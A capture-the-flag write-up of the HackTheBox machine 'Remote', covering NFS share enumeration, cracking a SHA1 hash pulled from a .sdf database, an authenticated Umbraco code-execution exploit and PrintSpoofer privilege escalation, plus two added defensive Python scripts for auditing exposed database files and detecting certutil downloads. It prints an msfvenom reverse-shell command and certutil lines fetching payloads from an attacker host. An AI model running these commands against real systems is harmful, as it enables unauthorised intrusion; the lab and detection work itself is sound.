Remote | NFS, .sdf file, impersonation


by Johann Van Niekerk


Introduction

This challenge from HackTheBox is rated Easy and is also on TJNull's list of prep boxes for the OSCP exam. Remote is an interesting challenge that was quite difficult for me as I haven't dealt with a .sdf file before. The initial enumeration and the path to the attack vector are in line with the challenge difficulty; however, when it came to mounting the share and navigating the significant number of files available, it became apparent that after you check for some easy, interesting files, you need to rely on automated searches such as grep.

The problem was that the .sdf file is a database file in the SQL Server Compact (SQL CE) format, which is developed by Microsoft, and it contains juicy information, but unless you are familiar with the file type it is very easy to pass over it.

Otherwise the challenge was fairly easy going from user access towards privileged access, and a great exercise in keeping your eyes open for file types.

Enumeration

sudo nmap -sV 10.10.10.180
21/tcp   open  ftp           Microsoft ftpd
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)

I initially started with enumeration on a few of the simple ports, as it is typically quicker to determine whether they hold valuable information. Starting with port 21, it is quick to check whether there is anything, and we find that it is possible to log in with anonymous credentials. Anonymous login is a common thing to test for on FTP services.

username: anonymous
password: anonymous

While enumerating the service, nothing is uncovered, and we will come back later if needed. Next, checking the web application shows that the page being served is .asp and part of a content management system named Umbraco. We use this information to see whether there are any known vulnerabilities listed for this CMS, and we find a few; however, we don't know the version number.

Unfortunately it was not possible to find any version numbers from the web app, and while there were numerous exploits available, most required authentication, so the name of the game is still finding credentials.

Eventually, by navigating the webpage, we uncover a login page when we click on the "Forms" button within the Contact page. Testing with common credentials does not lead anywhere either.

After looking through Burp, testing SQLi and directory busting, I decided to move on and look at other open ports. What was interesting was that port 111 (rpcbind) was open. A quick command returned some information that was not expected, namely NFS. Looking at our Nmap scan, we also see port 2049 (mountd), which goes hand in hand with rpcbind. This likely meant that there were folders being shared.

Running some Nmap scripts for NFS uncovered that the directory /site_backups is being shared and is available.

To take advantage of this opportunity, we set up a local folder to 'host' the content and then mount the remote share, which contains a rather large deposit of files, including config files and so forth.

It took a rather long time to search through the files and find anything interesting. It wasn't until I incidentally stumbled onto a .sdf file that I became curious what Google would tell me. This was a database file for SQL.

Exploitation

defaultapppool

The file itself shows up as a binary; however, using either cat or strings ended up dumping all the important information from this database file.

We ended up with 3 unique hashes that we could solve and, as you may notice, the admin hash was SHA1. Using something as simple as crackstation.net, the password hash was matched within seconds. This meant we had our first set of credentials and needed to test it somewhere.

I tried several different methods of testing the credentials (as SMB was also an open port) and they all failed. On the web application login I also attempted it with numerous methods and it always ended up failing. It wasn't until I cleared the input box and saw the following that I was reminded of what I was doing wrong:

It requires the full email address and I had just been using admin, adminadmin and administrator. This was a good lesson in paying attention.
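The same weakness can be checked from the owner's side before a backup directory is ever exported. The following is an added example, not code from the original post: it walks a tree, flags embedded-database files by extension and counts digest-shaped strings that a plain `strings` pass would reveal, without echoing them. The extension list, file names and sample data are constructed for illustration.

```python
import hashlib
import os
import re
import tempfile

DB_EXTENSIONS = {".sdf", ".mdf", ".sqlite", ".db", ".mdb"}  # embedded/local DB files
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")  # roughly what `strings` prints
HEX_DIGEST = re.compile(
    rb"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})(?![0-9a-fA-F])")
DIGEST_NAME = {32: "MD5-length", 40: "SHA-1-length", 64: "SHA-256-length"}  # hex lengths

def scan_file(path):
    """Count digest-shaped strings readable in the raw bytes; digests are not echoed."""
    counts = {}
    with open(path, "rb") as fh:
        data = fh.read()
    for run in PRINTABLE_RUN.finditer(data):
        for digest in HEX_DIGEST.findall(run.group()):
            kind = DIGEST_NAME[len(digest)]
            counts[kind] = counts.get(kind, 0) + 1
    return counts

def audit_tree(root):
    """Report every DB-type file, plus any other file exposing digest-shaped strings."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            is_db = os.path.splitext(name)[1].lower() in DB_EXTENSIONS
            counts = scan_file(path)
            if is_db or counts:
                report.append((os.path.relpath(path, root), is_db, counts))
    return sorted(report, key=lambda item: item[0])

def build_sample_tree(root):
    """Constructed sample: a fake .sdf holding one SHA-1 hex digest between binary bytes."""
    os.makedirs(os.path.join(root, "App_Data"))
    digest = hashlib.sha1(b"constructed-sample-password").hexdigest().encode()
    blob = b"\x00\x01\xff" * 20 + b"admin@example.test" + digest + b"\x00" * 16
    with open(os.path.join(root, "App_Data", "Sample.sdf"), "wb") as fh:
        fh.write(blob)
    with open(os.path.join(root, "Web.config"), "wb") as fh:
        fh.write(b"<configuration></configuration>")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, is_db, counts in audit_tree(build_sample_tree(tmp)):
            print(rel, "db-file" if is_db else "other", counts)
```

Any file this reports inside a directory that is about to be shared or backed up to a reachable location should be excluded or the export restricted to named hosts.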

With a successful login, we were directed to the admin portal and were able to quickly uncover the CMS version.

If you recall our previous exploit checks; the version we found aligns perfectly with an authenticated remote code execution script and we just recently got our credentials!

The Python script has simple syntax and allows you to immediately exploit the system with code execution.

This was also a tough lesson in looking at your errors and reading the exploit code! I was attempting numerous methods of sending a reverse shell through this script; however, I wasn't paying enough attention, as the additional arguments needed to be signaled with -a.

Finally, with a simple PowerShell base64 payload, we successfully got through to a user shell.

System

The first thing we check is our privileges, and immediately an enabled privilege stands out:

It is possible to take advantage of this privilege in order to escalate to SYSTEM. My preference with impersonation attacks is to use PrintSpoofer, and you can get a working binary from the PrintSpoofer GitHub repository or by googling.

The attack requires two files to be located on the target machine: the binary and another payload for a separate reverse shell.

# Setup payload
msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.6 lport=4445 -e x86/shikata_ga_nai -f exe -o shell.exe

# Transferred the necessary files over for impersonation attack
certutil -f -urlcache http://10.10.10.6/PrintSpoofer.exe print.exe
certutil -f -urlcache http://10.10.10.6/shell.exe shell.exe

Setting up an appropriate listener and running the PrintSpoofer exploit with the appropriate switches results in a SYSTEM shell!
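The certutil transfers above leave a distinctive command line in process-creation logs. The following detection logic is an added example, not part of the original post: it assumes events are available as dictionaries using the Sysmon process-creation field names Image, OriginalFileName and CommandLine, and every event except the first command line (taken from this page) is constructed.

```python
import re

TOKEN = re.compile(r'"[^"]*"|\S+')  # split a Windows command line, keeping quoted args
URL = re.compile(r"^(?:https?|ftp)://", re.I)

def certutil_download(event):
    """Return (url, output_name) when a process-creation event is a certutil URL fetch."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    if "certutil.exe" not in (image, original):  # OriginalFileName survives a rename
        return None
    args = [t.strip('"') for t in TOKEN.findall(event.get("CommandLine", ""))][1:]
    # certutil accepts both -switch and /switch, in any letter case
    switches = {a[1:].lower() for a in args if a.startswith(("-", "/"))}
    urls = [a for a in args if URL.match(a)]
    if "urlcache" not in switches or not urls:
        return None
    plain = [a for a in args if not a.startswith(("-", "/")) and not URL.match(a)]
    return urls[0], (plain[0] if plain else None)

def hunt(events):
    """Return (image, url, output_name) for every event that matches."""
    return [(e["Image"], *hit) for e in events if (hit := certutil_download(e))]

# Constructed sample events; only the first command line appears in the write-up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -f -urlcache http://10.10.10.6/PrintSpoofer.exe print.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\temp\a.iso SHA256"},
    {"Image": r"C:\Users\Public\cu.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "cu.exe /URLCache /split /f https://example.test/a.bin a.bin"},
    {"Image": r"C:\Windows\System32\whoami.exe", "OriginalFileName": "whoami.exe",
     "CommandLine": "whoami /priv"},
]

if __name__ == "__main__":
    for image, url, out in hunt(SAMPLE_EVENTS):
        print(f"certutil download: {image} fetched {url} -> {out}")
```

A hit where the parent process is a web server worker is the combination worth alerting on, since a CMS has no reason to fetch executables with certutil.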

Final Word

The box is on TJNull's list of OSCP-like boxes. The challenge was interesting and reinforces your methodology to look and use Google to your advantage when you discover something that appears interesting. Overall I did find the challenge frustrating, but that was due to my own experience with file types being insufficient. Next time I'll definitely not be skipping over .sdf files again.